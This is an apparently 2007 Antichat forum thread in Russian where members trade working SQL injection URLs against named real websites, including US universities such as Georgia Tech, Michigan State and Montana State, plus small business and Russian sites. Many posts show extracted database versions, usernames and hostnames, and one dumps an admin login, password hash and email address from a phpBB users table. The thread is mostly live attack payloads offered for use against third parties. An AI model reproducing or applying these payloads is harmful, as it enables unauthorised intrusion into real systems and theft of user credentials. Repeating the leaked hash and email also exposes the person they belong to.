SQL Инъекции

29.12.2007, 09:34

Scipio

Members of Antichat - Level 5

Регистрация: 02.11.2006

Сообщений: 781

С нами: 10274726

Репутация: 1917

Какая то непонятная украинская CMS`ка FreshKnowledge

сайт CMS`ки:_http://www.freshknowledge.net/
сайт разработчика:_http://www.setlab.net/
уязвим форум, наверное там полно скулей, но копаться не стал, т.к. интереса особого не представляет

Код:

http://www.setlab.net/forum/?action=view_subject&subject_id=-6+union+select+1,user(),version(),4,5,6,7,8,9,10/*

еще примеры:

Код:

http://www.future.com.ua/forum/?action=view_subject&subject_id=-6+union+select+1,user(),version(),4,5,6,7,8,9,10/*

Код:

http://youth.livinggod.org.ua/forum/?action=view_subject&subject_id=-6+union+select+1,user(),version(),4,5,6,7,8,9,10/*

Код:

http://streetball.future.com.ua/forum/?action=view_subject&subject_id=-6+union+select+1,user(),version(),4,5,6,7,8,9,10/*

𝕏 Twitter Reddit Telegram Копировать ссылку

__________________
Карфаген должен быть разрушен...

edu

29.12.2007, 12:19

Dr.Z3r0

Leaders of The World

Регистрация: 06.07.2007

Сообщений: 246

С нами: 9920546

Репутация: 1796

edu

Вот опять по edu прошолся, прошу любить и жаловать:

www.gatech.edu Georgia Institute of Technology

Код:

http://www.gatech.edu/calendar/event.php?id=-2210%20UNION%20SELECT%201,2,3,4,5,VERSION(),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32/*

5.0.37

www.history.msu.edu Department of History - Michigan State University

Код:

http://www.history.msu.edu/view_profile.php?id=-93%20UNION%20SELECT%201,2,AES_DECRYPT(AES_ENCRYPT(CONCAT_WS(0x203A20,VERSION(),USER(),DATABASE()),0x20),0x20),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31/*

4.1.11-Debian_4sarge7-log : dpthistory2@www.matrix.msu.edu : dpthistory2

www.montana.edu Montana State University

Код:

http://www.montana.edu/cpa/news/nwview.php?article=-5458%20UNION%20SELECT%201,VERSION(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24/*

4.0.17

__________________

Кто я?..

29.12.2007, 14:03

AkyHa_MaTaTa

Постоянный

Регистрация: 19.03.2007

Сообщений: 684

С нами: 10077446

Репутация: 1020

вот еще одна едушка:

Код:

 http://idl63.ils.unc.edu/chirag/Health/showmetadata.php?video_id=-1+union+select+1,2,3,4,5,6,7,8,9,database(),user(),12,version(),14,15,16,17,18,19,20/*

29.12.2007, 15:57

SWAT

Участник форума

Регистрация: 14.12.2006

Сообщений: 211

С нами: 10214321

Репутация: 552

Код:

  http://travel-tourthailand.com/hotel_detail.php?id=-1+union+select+1,2,VERSION(),4,5,6,7,8,9,10,11,12,13,14,15,16,17+from+member/*

Код:

http://www.adventureincostarica.com/zones.php?ID=-1+union+select+1,VERSION(),3/*

29.12.2007, 16:15

ElteRUS

Постоянный

Регистрация: 11.10.2007

Сообщений: 406

С нами: 9780227

Репутация: 1423

http://www.pyramid.spb.ru/content/news/default.asp?shmode=2&ids=1&ida=-1+or+1=@@version

Microsoft SQL Server 2000 - 8.00.760 (Intel X86) Dec 17 2002 14:22:05 Copyright (c) 1988-2003 Microsoft Corporation Enterprise Edition on Windows NT 5.2 (Build 3790: Service Pack 2)

--------------------------------------------------------------------------
http://www.rus7.org/index.php?p=news&newid=-1+union+select+1,2,3,4,5,6,7,concat_ws(0x2F,versio n(),database(),user())/*

4.0.27-max-log/utsport1_db01/utsport1_db01@v29.valuehost.ru

--------------------------------------------------------------------------
http://www.combi-spb.ru/?module=news&id=-1+union+select+1,2,concat_ws(0x2F,version(),databa se(),user()),4,5/*

4.0.26/u63709/u63709@10.10.11.193

--------------------------------------------------------------------------
echoperm.ru

http://www.echoperm.ru/article.php?id=-1+union+select+1,2,concat_ws(0x2F,version(),databa se(),user()),4,5,6/*&part_id=2&class=news

4.1.20-log/echotest/echotest@localhost

http://www.echoperm.ru/article.php?id=-1+union+select+1,2,concat_ws(0x2F,username,user_pa ssword,user_email),4,5,6+from+phpbb_users/*&part_id=2&class=news

логин/хеш/мейл сразу все
admin/f609688322a2811966aeb9aca67e2557/gufar@inbox.ru

29.12.2007, 17:29

SWAT

Участник форума

Регистрация: 14.12.2006

Сообщений: 211

С нами: 10214321

Репутация: 552

Код:

http://www.silbersaiten.de/show_item.php?id=-111+union+select+1,2,concat(id,0x3a,name),4,5,6,7,8,9+from+content/*

Код:

http://www.visitloudoncounty.com/show_item.php?id=-26+union+select+1,2/*

Код:

http://www.gregsequipment.com/show_item.php?id=-61+union+select+1,2,3,4,5,6,7,8,9,10+from+INFORMATION_SCHEMA.TABLES/*

Код:

https://www.happyvalleyamishtraders.com/store/show_item.php?id=-116+union+select+1,2,3,4,VERSION(),6,7,8,9,10,11,12,13,14/*

Код:

http://moblog.co.uk/view.php?id=-77571+union+select+1,2,3,4,5,6,7,8,9,10,11,12,concat(username,0x3a,password),14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49+from+mob_users/*

Последний раз редактировалось SWAT; 29.12.2007 в 17:48..

29.12.2007, 17:52

S(r1pt

Новичок

Регистрация: 31.07.2007

Сообщений: 20

С нами: 9884330

Репутация: 18

Код:

http://itsoft.ru/search/?search_query='&in_cat='

Код:

http://cs-server.ru/news/detail/?item_id='

Последний раз редактировалось S(r1pt; 29.12.2007 в 17:55..

29.12.2007, 17:58

v1ru$

Постоянный

Регистрация: 17.03.2007

Сообщений: 336

С нами: 10080326

Репутация: 576

Код:

http://mathinfo.montclair.edu/undergrad_research/profile.php?id=-48+union+select+1,concat(user(),0x3a,version(),database()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24/*

mathweb@localhost:4.0.18-standard-logmath

29.12.2007, 17:58

Mike 007

Познающий

Регистрация: 04.04.2007

Сообщений: 54

С нами: 10054253

Репутация: 86

Код:

http://www.gangrule.com/gangs.php?ID=-1+union+select+user()/*

oldtapes_gangrul@localhost
4.1.22-standard-log
oldtapes_gangrulecom

Код:

http://www.fikb.it/news.asp?id=-1'

Errore SQL

Errore di run-time di Microsoft VBScript error '800a01a8'

Necessario oggetto: 'DBRecordSet(...)'

Код:

http://www.scamshield.com/Feature.asp?id=-1'

Код:

http://www.anchem.ru/catalog/dirCat.asp?id=-1'

Microsoft OLE DB Provider for ODBC Drivers error '80040e14'

[Microsoft][ODBC Microsoft Access Driver] Syntax error (missing operator) in query expression 'CAT_ID = -1'''.

/catalog/dirCat.asp, line 15

Код:

http://www.r66-rabota.ru/post.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41/*

Код:

http://www.socket2000.com/index.asp?id=-1'

Microsoft OLE DB Provider for ODBC Drivers error '80040e14'

[Microsoft][ODBC Microsoft Access Driver] Syntax error in string in query expression 'category=-1' and active=true order by xdate desc'.

/includes/include_functions.asp, line 10

Код:

http://www.scamshield.com/Feature.asp?id=-1'

Microsoft JET Database Engine error '80040e14'

Syntax error in string in query expression 'ArticleNumber = -1''.

/Feature.asp, line 21

Последний раз редактировалось Mike 007; 29.12.2007 в 18:19..

#10

29.12.2007, 18:05

SWAT

Участник форума

Регистрация: 14.12.2006

Сообщений: 211

С нами: 10214321

Репутация: 552

Код:

http://ecodefense.ru/view.php?id=-503+union+select+1,2,3,4,5,6,7,8,9,VERSION(),11/*

Код:

http://www.hoglezoo.org/animals/view.php?id=-23+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49/*

Последний раз редактировалось SWAT; 29.12.2007 в 18:24..

Создать сделку

Мои сделки

Сделка